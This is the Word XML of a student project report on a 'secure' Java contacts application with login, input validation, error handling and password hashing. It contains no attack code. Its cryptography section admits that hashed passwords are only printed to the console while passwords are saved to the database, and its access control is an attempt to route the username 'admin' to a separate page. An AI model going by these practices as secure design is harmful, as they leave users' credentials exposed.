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6171" w14:textId="77777777" w:rsidR="00494D6B" w:rsidRDefault="00494D6B" w:rsidP="008C04B1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5920F40E" w14:textId="77777777" w:rsidR="005A76D4" w:rsidRDefault="005A76D4" w:rsidP="005A76D4">
      <w:pPr>
        <w:pStyle w:val="Title"/>
      </w:pPr>
      <w:r>
        <w:t>Project Report</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="603FAC47" w14:textId="77777777" w:rsidR="00050F50" w:rsidRDefault="00050F50" w:rsidP="005A76D4">
      <w:pPr>
        <w:pStyle w:val="Title"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Degree </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C10EEA" w14:textId="77777777" w:rsidR="00050F50" w:rsidRDefault="00050F50" w:rsidP="005A76D4">
      <w:pPr>
        <w:pStyle w:val="Title"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Department </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A65E8CB" w14:textId="77777777" w:rsidR="005A76D4" w:rsidRPr="00920A79" w:rsidRDefault="005A76D4" w:rsidP="005A76D4">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00920A79">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="14342742" wp14:editId="2FD2C5C0">
                <wp:extent cx="1440180" cy="0"/>
                <wp:effectExtent l="11430" t="6350" r="5715" b="1270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E32B9FB" id="_x0000_t32" coordsize="21600,21600" o:spt="32" o:oned="t" path="m,l21600,21600e" filled="f">
                <v:path arrowok="t" fillok="f" o:connecttype="none"/>
                <o:lock v:ext="edit" shapetype="t"/>
              </v:shapetype>
              <v:shape id="Straight Arrow Connector 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">
                <w10:anchorlock/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="12A0A005" w14:textId="77777777" w:rsidR="005A76D4" w:rsidRDefault="005A76D4" w:rsidP="005A76D4">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
        <w:rPr>
          <w:caps/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00920A79">
        <w:rPr>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t>Project</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Title</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3727A55A" w14:textId="77777777" w:rsidR="005A76D4" w:rsidRDefault="005A76D4" w:rsidP="005A76D4">
      <w:pPr>
        <w:pStyle w:val="Author"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009A4B2F">
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Student’s first and last name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06FF36C1" w14:textId="77777777" w:rsidR="005A76D4" w:rsidRPr="009A4B2F" w:rsidRDefault="005A76D4" w:rsidP="005A76D4">
      <w:pPr>
        <w:pStyle w:val="Author"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">Student Number </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07E4416A" w14:textId="77777777" w:rsidR="00803DD3" w:rsidRDefault="00803DD3" w:rsidP="008C04B1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5AAE34EE" w14:textId="77777777" w:rsidR="00803DD3" w:rsidRDefault="00803DD3" w:rsidP="008C04B1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68317BDB" w14:textId="77777777" w:rsidR="00803DD3" w:rsidRDefault="00803DD3" w:rsidP="008C04B1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D6961E4" w14:textId="77777777" w:rsidR="00803DD3" w:rsidRDefault="00803DD3" w:rsidP="008C04B1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5EDD3FCB" w14:textId="77777777" w:rsidR="00803DD3" w:rsidRDefault="00803DD3" w:rsidP="008C04B1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68E53206" w14:textId="77777777" w:rsidR="00803DD3" w:rsidRDefault="00803DD3" w:rsidP="008C04B1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3BBD03DF" w14:textId="77777777" w:rsidR="00803DD3" w:rsidRDefault="00803DD3" w:rsidP="008C04B1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D4A46DF" w14:textId="77777777" w:rsidR="00913C12" w:rsidRDefault="00913C12" w:rsidP="008C04B1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="058DB015" w14:textId="77777777" w:rsidR="00835D10" w:rsidRDefault="00835D10" w:rsidP="008C04B1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27A8CBA7" w14:textId="77777777" w:rsidR="00835D10" w:rsidRDefault="00835D10" w:rsidP="008C04B1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11999E16" w14:textId="77777777" w:rsidR="00835D10" w:rsidRPr="003E62AB" w:rsidRDefault="0024726A" w:rsidP="0081422C">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="4F81BD" w:themeColor="accent1"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003E62AB">
        <w:rPr>
          <w:color w:val="4F81BD" w:themeColor="accent1"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Background </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D52725B" w14:textId="77777777" w:rsidR="00023439" w:rsidRPr="00215973" w:rsidRDefault="00003FA6" w:rsidP="00023439">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00215973">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t xml:space="preserve">This section should provide a brief introduction to the </w:t>
      </w:r>
      <w:r w:rsidR="00747957" w:rsidRPr="00215973">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>project</w:t>
      </w:r>
      <w:r w:rsidR="00023439">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>. T</w:t>
      </w:r>
      <w:r w:rsidR="00023439" w:rsidRPr="00023439">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t xml:space="preserve">he major security problems associated with </w:t>
      </w:r>
      <w:r w:rsidR="00023439">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="00023439" w:rsidRPr="00023439">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>application</w:t>
      </w:r>
      <w:r w:rsidR="00023439">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t xml:space="preserve"> proposed in the context of the project must be discussed </w:t>
      </w:r>
      <w:r w:rsidR="00023439" w:rsidRPr="00023439">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>and how these problems are addressed.</w:t>
      </w:r>
      <w:r w:rsidR="00023439">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="007664CE">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BD4B94E" w14:textId="77777777" w:rsidR="00D12602" w:rsidRDefault="00D12602" w:rsidP="00D12602">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>The idea of my project is to create a secure Java Application, in which users can create an account and login. When user’s login, they have access to fields, in which they can insert their friends, family or work colleague’s details. In this, the user can insert first names, last names, phones numbers, email addresses, apply a profile picture to each contact and submit this.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EF9E805" w14:textId="2702683E" w:rsidR="00003FA6" w:rsidRDefault="00D12602" w:rsidP="00D12602">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>The user can edit or delete contacts in which they have already entered. When this is done, the table with contact information will refresh and it will display an updated version of the table for the user. I created the project because I thought it would be a good idea to apply security features to it, in which input fields are secure and will not allow and SQL injection etc. The idea is a phone catalogue that takes into consideration different aspects of your contacts information.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="460D66B4" w14:textId="77777777" w:rsidR="00D12602" w:rsidRDefault="00D12602" w:rsidP="00D12602">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Major security problems associated with the project are: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61843CAA" w14:textId="382E960B" w:rsidR="00D12602" w:rsidRDefault="00D12602" w:rsidP="00D12602">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:sym w:font="Symbol" w:char="F0B7"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Authentication and Password Management </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E58988F" w14:textId="77777777" w:rsidR="00D12602" w:rsidRDefault="00D12602" w:rsidP="00D12602">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:sym w:font="Symbol" w:char="F0B7"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Cryptographic practices</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ACBE0CC" w14:textId="77777777" w:rsidR="00D12602" w:rsidRDefault="00D12602" w:rsidP="00D12602">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:sym w:font="Symbol" w:char="F0B7"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Input Validation </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D92BA2" w14:textId="77777777" w:rsidR="00D12602" w:rsidRDefault="00D12602" w:rsidP="00D12602">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:sym w:font="Symbol" w:char="F0B7"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_Hlk511288865"/>
      <w:r>
        <w:t xml:space="preserve">Error Handling and Logging </w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="2265D1B1" w14:textId="6A69017E" w:rsidR="00D12602" w:rsidRDefault="00D12602" w:rsidP="00D12602">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:sym w:font="Symbol" w:char="F0B7"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Access Control</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="596B335D" w14:textId="009E598B" w:rsidR="00FB3E37" w:rsidRDefault="00FB3E37" w:rsidP="00FB3E37">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Authentication and Password Management</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FEBC1D9" w14:textId="12247E6F" w:rsidR="00DF15E8" w:rsidRDefault="00D12602" w:rsidP="00DF15E8">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Users can register and login, with their passwords saving to the database. The login button has a try statement that selects usernames, passwords and pictures from the database. When the information is validated, the user is accepted into the application. The picture is then displayed into a field I created, especially for the images of users. The same for usernames to be displayed when a user logs in. If the prepareStatement </w:t>
      </w:r>
      <w:r w:rsidR="00DF15E8">
        <w:t>can’t</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> get correct info from database for the username textfield, there is a login error message displaying. </w:t>
      </w:r>
      <w:r w:rsidR="00DF15E8">
        <w:t>There is then a SQLException “catch” method, a</w:t>
      </w:r>
      <w:r w:rsidR="00DF15E8" w:rsidRPr="00DF15E8">
        <w:t xml:space="preserve"> catch block catches and handles try block exceptions.</w:t>
      </w:r>
      <w:r w:rsidR="00DF15E8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DF15E8" w:rsidRPr="00DF15E8">
        <w:t>A try block is the block of code in which exceptions occur</w:t>
      </w:r>
      <w:r w:rsidR="00DF15E8">
        <w:t>, this is where then select statement lies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50C768B6" w14:textId="60292FFC" w:rsidR="00DF15E8" w:rsidRDefault="00DF15E8" w:rsidP="00DF15E8">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>For the signUpform.java, the create account button contains a try and catch statement again, for where an exception occurs, and the catch handles the try exception. There are preparedStatements in which its inserts user information into certain columns of the database. Here it checks all fields and specifies if a username is already taken.</w:t>
      </w:r>
      <w:r w:rsidR="00865C3D">
        <w:t xml:space="preserve"> Account is then created, or something went wrong</w:t>
      </w:r>
      <w:r w:rsidR="00151C10">
        <w:t xml:space="preserve"> – followed by a catch method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2722BBDA" w14:textId="77777777" w:rsidR="00FB3E37" w:rsidRDefault="00FB3E37" w:rsidP="00DF15E8">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DD9D7BC" w14:textId="14FD1A7D" w:rsidR="00D12602" w:rsidRDefault="00FB3E37" w:rsidP="00FB3E37">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Input Validation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CEDF6FD" w14:textId="15A2CF25" w:rsidR="00FB3E37" w:rsidRDefault="00FB3E37" w:rsidP="00FB3E37">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">All fields are validated using the ‘keyTyped’ method. </w:t>
      </w:r>
      <w:r w:rsidR="004F15F0">
        <w:t xml:space="preserve">This makes sure that the user can only enter certain values into any given field. For </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="004F15F0">
        <w:t>example</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00C260C3">
        <w:t xml:space="preserve"> in the MyContactsForm</w:t>
      </w:r>
      <w:r w:rsidR="004F15F0">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00C260C3">
        <w:t xml:space="preserve">is </w:t>
      </w:r>
      <w:r w:rsidR="004F15F0">
        <w:t>the Address field</w:t>
      </w:r>
      <w:r w:rsidR="00C260C3">
        <w:t xml:space="preserve"> that</w:t>
      </w:r>
      <w:r w:rsidR="004F15F0">
        <w:t xml:space="preserve"> has a method, in which if a key that is not a letter, a number or a space – it will prompt an error message and delete </w:t>
      </w:r>
      <w:r w:rsidR="00C260C3">
        <w:t>what’s</w:t>
      </w:r>
      <w:r w:rsidR="004F15F0">
        <w:t xml:space="preserve"> already been typed in.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F17810" w14:textId="029C66E0" w:rsidR="00416F14" w:rsidRDefault="00416F14" w:rsidP="00FB3E37">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">On the MyContactsForm, it has validation, in which when adding a contact, its checks so that an image must be selected to update your contacts information. This is followed by a try statement where the image and rest of the information is inserted into contact, the table is </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>refreshed</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and the fields are cleared, with a catch exception after it.</w:t>
      </w:r>
      <w:r w:rsidR="00205D8F">
        <w:t xml:space="preserve"> It prompts then for a profile picture, if one is not yet chosen.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4523582C" w14:textId="1ABFA1ED" w:rsidR="00354EA6" w:rsidRDefault="00354EA6" w:rsidP="00FB3E37">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Created a method called </w:t>
      </w:r>
      <w:r w:rsidR="00511852">
        <w:t>‘</w:t>
      </w:r>
      <w:r>
        <w:t>verifData</w:t>
      </w:r>
      <w:r w:rsidR="00511852">
        <w:t>’</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, in which it checks all the data in the form and ensures all fields are filled out. Checks </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>firstname</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, last name, phone and then image to be selected.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="675B7656" w14:textId="7B14B6A0" w:rsidR="00B065F6" w:rsidRDefault="00B065F6" w:rsidP="00FB3E37">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>If the users want to ‘edit’ their contacts, they must have an image changed to do so too.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64AF0AFD" w14:textId="54DC4D5C" w:rsidR="0079425C" w:rsidRDefault="003B468C" w:rsidP="00FB3E37">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Created a method called ‘</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>isUsernameExist</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidR="00A176CC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00511852">
        <w:t xml:space="preserve">in the signup page to </w:t>
      </w:r>
      <w:r w:rsidR="00A176CC">
        <w:t xml:space="preserve">check the input of the user for the username section, it checks when clicked to login whether or not the username is already taken, and </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00A176CC">
        <w:t>wont</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00A176CC">
        <w:t xml:space="preserve"> allow further activity until the username is changed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2290AB66" w14:textId="77777777" w:rsidR="00511852" w:rsidRDefault="00511852" w:rsidP="00FB3E37">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A152892" w14:textId="10B59A45" w:rsidR="00DF15E8" w:rsidRDefault="00511852" w:rsidP="00511852">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00511852">
        <w:t>Error Handling and Logging</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BBDE5A1" w14:textId="0C93BD24" w:rsidR="00A539D2" w:rsidRDefault="00A539D2" w:rsidP="00D12602">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00A539D2">
        <w:t>Error handling refers to the response and recovery procedures from error conditions present in a software application</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00A539D2">
        <w:t>The try block contains set of statements where an exception can occur. A try block is always followed by a catch block, which handles the exception that occurs in associated try block. A try block must be followed by catch blocks or finally block or both.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A539D2">
        <w:t>if you think that certain statements in a program can throw a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">n </w:t>
      </w:r>
      <w:r w:rsidRPr="00A539D2">
        <w:t>exception, enclose them in try block and handle that exception</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BA0F5F0" w14:textId="77777777" w:rsidR="00853DCD" w:rsidRDefault="00A539D2" w:rsidP="00853DCD">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00A539D2">
        <w:t>A catch block is where you handle the exceptions, this block must follow the try block. A single try block can have several catch blocks associated with it. You can catch different exceptions in different catch blocks. When an exception occurs in try block, the corresponding catch block that handles that particular exception executes.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> I have several try blocks in the login and signup forms where the try method contains SQL queries as exceptions can occur here, where the catch clause can then handle that exception.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BA5BFE1" w14:textId="5ACA2F43" w:rsidR="00853DCD" w:rsidRDefault="00853DCD" w:rsidP="00853DCD">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>The Password Utilities page also has catch exceptions for the reason of a problem happening with the hashing of a password.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32E53D91" w14:textId="50C834FD" w:rsidR="00A539D2" w:rsidRDefault="00A90314" w:rsidP="00853DCD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Cryptographic practices</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2423D3E6" w14:textId="0BF6C4FB" w:rsidR="00A90314" w:rsidRDefault="00A90314" w:rsidP="00A90314">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>For this heading I have attempted to crypto</w:t>
      </w:r>
      <w:r w:rsidR="001C5980">
        <w:t xml:space="preserve"> enhance</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the login details of users.</w:t>
      </w:r>
      <w:r w:rsidR="001C5980">
        <w:t xml:space="preserve"> The user’s password is hashed and salted within the login and sign up forms, but they do not save to the database. They only display in the command line on </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="001C5980">
        <w:t>netbeans</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="001C5980">
        <w:t>, showing the hashed password.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14EF881C" w14:textId="2105F0D3" w:rsidR="001C5980" w:rsidRDefault="001C5980" w:rsidP="00A90314">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">In the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>sign up</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> form, the create button contains the salt generation and protects the users password – this is where it prints out to the command line. The login form contains then encrypted and base64 encoded passwords, read from the database</w:t>
      </w:r>
      <w:r w:rsidR="00475E22">
        <w:t xml:space="preserve"> and has the salt value that would be stored in the database. It also checks if passwords match. The main cryptographic page is the password utilities </w:t>
      </w:r>
      <w:r w:rsidR="00475E22">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">page, this contains the iterations, the key length, the hash function, </w:t>
      </w:r>
      <w:r w:rsidR="00B435E3">
        <w:t>as well</w:t>
      </w:r>
      <w:r w:rsidR="00475E22">
        <w:t xml:space="preserve"> as the generating secure password and verify </w:t>
      </w:r>
      <w:r w:rsidR="00B435E3">
        <w:t>user’s</w:t>
      </w:r>
      <w:r w:rsidR="00475E22">
        <w:t xml:space="preserve"> passwords methods.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A3A8FD2" w14:textId="38D5F7E2" w:rsidR="00B435E3" w:rsidRDefault="00B435E3" w:rsidP="00B435E3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Access Control</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03937498" w14:textId="588ECDCB" w:rsidR="00F6745F" w:rsidRDefault="00F6745F" w:rsidP="00F6745F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Attempted to get the username textfield to send to new page when ‘admin’ was </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>entered into</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> the field.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75C2A530" w14:textId="77777777" w:rsidR="00D12602" w:rsidRDefault="00D12602" w:rsidP="00D12602">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
